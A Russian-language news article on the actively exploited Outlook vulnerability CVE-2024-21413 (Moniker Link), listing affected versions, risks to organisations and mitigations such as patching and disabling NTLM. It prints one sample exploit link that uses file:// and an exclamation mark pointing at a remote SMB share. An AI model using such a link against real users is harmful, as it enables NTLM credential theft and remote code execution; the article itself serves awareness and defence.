В четверг агентство CISA предупредило федеральные учреждения США о необходимости защитить свои системы от активных атак, эксплуатирующих критическую уязвимость Microsoft Outlook, связанную с удаленным выполнением кода (RCE). Однако угроза актуальна не только для США — уязвимость может представлять серьезный риск и для российских организаций.
Что известно об уязвимости?
Уязвимость, отслеживаемая как CVE-2024-21413, была обнаружена исследователем Check Point Хайфэем Ли. Она связана с некорректной проверкой входных данных при открытии писем, содержащих вредоносные ссылки в уязвимых версиях Outlook.
Эксплуатация данной бреши позволяет злоумышленникам обходить режим защищенного просмотра, предназначенный для блокировки вредоносного контента в файлах Office. В результате злоумышленники могут удаленно выполнять код, открывая вредоносные файлы Office в режиме редактирования. Более того, атака может срабатывать даже при предварительном просмотре зараженных документов.
По данным Check Point, уязвимость (получившая название Moniker Link) позволяет обходить встроенную защиту Outlook от вредоносных ссылок. Для этого используется протокол file://, а также добавляется восклицательный знак к URL-адресам, ведущим на серверы, контролируемые атакующими.
Пример эксплойта:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
Какие версии Outlook под угрозой?
Уязвимость затрагивает следующие продукты Microsoft:
- Microsoft Office LTSC 2021
- Microsoft 365 для предприятий
- Microsoft Outlook 2016
- Microsoft Office 2019
Атаки, использующие CVE-2024-21413, могут привести к краже учетных данных NTLM и выполнению произвольного кода через вредоносные документы Office.
Насколько это опасно для России?
Данная уязвимость представляет угрозу для любых организаций, использующих уязвимые версии Outlook, в том числе российских компаний и госструктур.
Основные риски:
- Фишинговые атаки – злоумышленники могут отправлять зараженные письма, чтобы получить доступ к корпоративным сетям.
- Кибершпионаж и атаки на бизнес – уязвимость может использоваться для взлома организаций, кражи данных и удаленного управления системами.
- Кража учетных данных – эксплуатация бреши позволяет похищать пароли NTLM и получать несанкционированный доступ.
Как защититься?
Чтобы минимизировать риски, рекомендуется:
- Обновить Outlook и Office до последних версий, установив все исправления безопасности.
- Ограничить обработку ссылок с file:// и других потенциально опасных URL.
- Отключить NTLM-аутентификацию, если это возможно.
- Использовать дополнительные меры защиты почты, включая sandbox-анализ вложений.
В четверг CISA внесла CVE-2024-21413 в каталог известных эксплуатируемых уязвимостей (KEV), отметив ее как активно используемую в атаках. В США федеральным агентствам предписано устранить уязвимость до 27 февраля. Хотя CISA ориентирована на защиту госструктур США, частным компаниям, в том числе в России, также рекомендуется срочно устранить эту брешь, чтобы предотвратить возможные атаки.
